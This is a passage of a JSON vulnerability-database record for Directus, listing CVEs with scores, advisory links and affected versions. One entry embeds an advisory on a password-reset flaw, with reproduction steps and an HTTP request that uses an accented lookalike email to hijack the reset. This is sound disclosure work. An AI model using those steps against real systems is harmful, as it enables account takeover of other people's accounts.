Users unable to upgrade may mitigate this issue by ensuring that no user has `read` access to the `password` field in `directus_users`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-27481","reference_id":"","reference_type":"","scores":[{"value":"0.00301","scoring_system":"epss","scoring_elements":"0.53689","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-27481"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/pull/14829","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:10Z/"}],"url":"https://github.com/directus/directus/pull/14829"},{"reference_url":"https://github.com/directus/directus/pull/15010","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:10Z/"}],"url":"https://github.com/directus/directus/pull/15010"},{"reference_url":"https://nvd.ni
st.gov/vuln/detail/CVE-2023-27481","reference_id":"CVE-2023-27481","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-27481"},{"reference_url":"https://github.com/advisories/GHSA-m5q3-8wgf-x8xf","reference_id":"GHSA-m5q3-8wgf-x8xf","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m5q3-8wgf-x8xf"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-m5q3-8wgf-x8xf","reference_id":"GHSA-m5q3-8wgf-x8xf","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:10Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-m5q3-8wgf-x8xf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63065?format=json","purl":"pkg:npm/directus@9.16.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cgw-zr3k-3fen"},{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8r4e-a1vf-9bd9"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-ejme-tqn4-byhk"},{"vulnerability":"VCID-eygf-
cb4y-hqd3"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gjju-tu4e-gqfc"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-hrqc-8err-4fbx"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-szny-2sbf-v7de"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-v4vz-smcx-gygb"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xc7t-gwaz-ckeu"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.16.0"}],"aliases":["CVE-2023-27481","GHSA-m5q3-8wgf-x8xf"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-et4m-8y15-9fb9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/17177?format=json","vulnerability_id":"VCID-eygf-cb4y-hqd3","summary":"Insertion of Sensitive Information into Log File\nDirectus is a real-time API and App dashboard for managing SQL database content. Prior to version 9.23.3, the `directus_refresh_token` is not redacted properly from the log outputs and can be used to impersonate users without their permission. 
This issue is patched in version 9.23.3.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-28443","reference_id":"","reference_type":"","scores":[{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.19237","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-28443"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/blob/7c479c5161639aac466c763b6b958a9524201d74/api/src/logger.ts#L13","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-21T15:28:44Z/"}],"url":"https://github.com/directus/directus/blob/7c479c5161639aac466c763b6b958a9524201d74/api/src/logger.ts#L13"},{"reference_url":"https://github.com/directus/directus/commit/349536303983ccba68ecb3e4fb35315424011afc","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-21T15:28:44Z/"}],"url":"https://github.com/directus/directus/commit/349536303983ccba68ecb3e4fb35315424011afc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-28443","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","
scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-28443"},{"reference_url":"https://github.com/advisories/GHSA-8vg2-wf3q-mwv7","reference_id":"GHSA-8vg2-wf3q-mwv7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8vg2-wf3q-mwv7"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-8vg2-wf3q-mwv7","reference_id":"GHSA-8vg2-wf3q-mwv7","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-21T15:28:44Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-8vg2-wf3q-mwv7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63229?format=json","purl":"pkg:npm/directus@9.23.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cgw-zr3k-3fen"},{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8r4e-a1vf-9bd9"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-ejme-tqn4-byhk"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gjju-tu4e-gqfc"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"}
,{"vulnerability":"VCID-hrqc-8err-4fbx"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-jmem-8d4q-x7br"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xc7t-gwaz-ckeu"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.3"}],"aliases":["CVE-2023-28443","GHSA-8vg2-wf3q-mwv7"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-eygf-cb4y-hqd3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/292370?format=json","vulnerability_id":"VCID-g34r-4mb9-afab","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-30352","reference_id":"","reference_type":"","scores":[{"value":"0.00144","scoring_system":"epss","scoring_elements":"0.34407","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-30352"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/
directus/commit/ac5a9964d9926f20dc063a74cb417dc7bbad676d","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-27T15:14:43Z/"}],"url":"https://github.com/directus/directus/commit/ac5a9964d9926f20dc063a74cb417dc7bbad676d"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-7wq3-jr35-275c","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-27T15:14:43Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-7wq3-jr35-275c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-30352","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-30352"},{"reference_url":"https://github.com/advisories/GHSA-7wq3-jr35-275c","reference_id":"GHSA-7wq3-jr35-275c","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-7wq3-jr35-275c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/195096?format=json","purl":"pkg:npm/directus@11.5.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability"
:"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.5.0"}],"aliases":["CVE-2025-30352","GHSA-7wq3-jr35-275c"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-g34r-4mb9-afab"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19589?format=json","vulnerability_id":"VCID-gjju-tu4e-gqfc","summary":"Directus has MySQL accent insensitive email matching\n## Password reset vulnerable to accent confusion\n\nThe password reset mechanism of the Directus backend is implemented in a way where combined with (specific, need to double check if i can work around) configuration in MySQL or MariaDB. As such, it allows attackers to receive a password reset email of a victim user, specifically having it arrive at a similar email address as the victim with a one or more characters changed to use accents. 
\n\nThis is due to the fact that by default MySQL/MariaDB are configured for accent-insensitive and case-insensitive comparisons.\n\nMySQL weak comparison:\n```sql\nselect 1 from directus_users where 'julian@cure53.de' = 'julian@cüre53.de';\n```\n\nThis is exploitable due to an error in the API using the supplied email address for sending the reset password mail instead of using the email from the database.\n\n### Steps to reproduce:\n\n1. The attacker knows the email address of the victim user, e.g., `julian@cure53.de` (possibly just the domain could be enough for an educated guess).\n2. An off-by-one accented domain `cüre53.de` can be registered to be able to receive emails.\n3. With this email the attacker can request a password reset for `julian@cüre53.de`. \n```http\nPOST /auth/password/request HTTP/1.1\nHost: example.com\n[...]\n{\"email\":\"julian@cüre53.de\"}\n```\n4. The supplied email (julian@cüre53.de) gets checked against the database and will match the non-accented email `julian@cure53.de` and will continue to email the password reset link to the provided email address instead of the saved email address.\n5. With this email the attacker can log into the target account and use it for nefarious things\n\n### Workarounds\nShould be possible with collations but haven't been able to confirm this. 
\n\n### References\n- https://www.monolune.com/articles/what-is-the-utf8mb4_0900_ai_ci-collation/\n- https://dev.mysql.com/doc/refman/8.0/en/charset-unicode-sets.html","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27295","reference_id":"","reference_type":"","scores":[{"value":"0.00604","scoring_system":"epss","scoring_elements":"0.69922","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27295"},{"reference_url":"https://dev.mysql.com/doc/refman/8.0/en/charset-unicode-sets.html","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://dev.mysql.com/doc/refman/8.0/en/charset-unicode-sets.html"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/a8ef790ea2d28b1727f9027d99bd360920d57919","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/commit/a8ef790ea2d28b1727f9027d99bd360920d57919"},{"reference_url":"https://www.monolune.com/articles/what-is-the-utf8mb4_0900_ai_ci-collation","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.monolune.com/arti
cles/what-is-the-utf8mb4_0900_ai_ci-collation"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27295","reference_id":"CVE-2024-27295","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27295"},{"reference_url":"https://github.com/advisories/GHSA-qw9g-7549-7wg5","reference_id":"GHSA-qw9g-7549-7wg5","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qw9g-7549-7wg5"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-qw9g-7549-7wg5","reference_id":"GHSA-qw9g-7549-7wg5","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-03-05T19:45:59Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-qw9g-7549-7wg5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/68026?format=json","purl":"pkg:npm/directus@10.8.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cgw-zr3k-3fen"},{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8r4e-a1vf-9bd9"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-g34r-4mb9-a
fab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xc7t-gwaz-ckeu"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.8.3"}],"aliases":["CVE-2024-27295","GHSA-qw9g-7549-7wg5"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gjju-tu4e-gqfc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/191782?format=json","vulnerability_id":"VCID-gpfk-nsnr-4khn","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-23080","reference_id":"","reference_type":"","scores":[{"value":"0.00116","scoring_system":"epss","scoring_elements":"0.30093","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-23080"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":
"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/6da3f1ed5034115b1da00440008351bf0d808d83","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/commit/6da3f1ed5034115b1da00440008351bf0d808d83"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-23080","reference_id":"CVE-2022-23080","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-23080"},{"reference_url":"https://www.mend.io/vulnerability-database/CVE-2022-23080","reference_id":"CVE-2022-23080","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.mend.io/vulnerability-database/CVE-2022-23080"},{"reference_url":"https://github.com/advisories/GHSA-5h75-pvq4-82c9","reference_id":"GHSA-5h75-pvq4-82c9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5h75-pvq4-82c9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/60235?format=json","purl":"pkg:npm/directus@9.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cgw-zr3k-3fen"},{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8r4e-a1vf-9bd9"},{"vulnerability":"VCID-9gba-zszk-p3h6"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a
6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-ejme-tqn4-byhk"},{"vulnerability":"VCID-et4m-8y15-9fb9"},{"vulnerability":"VCID-eygf-cb4y-hqd3"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gjju-tu4e-gqfc"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-hrqc-8err-4fbx"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-szny-2sbf-v7de"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-v4vz-smcx-gygb"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.7.0"}],"aliases":["CVE-2022-23080","GHSA-5h75-pvq4-82c9"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gpfk-nsnr-4khn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330173?format=json","vulnerability_id":"VCID-gwwu-p9jt-eke3","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35413","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05028","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/e
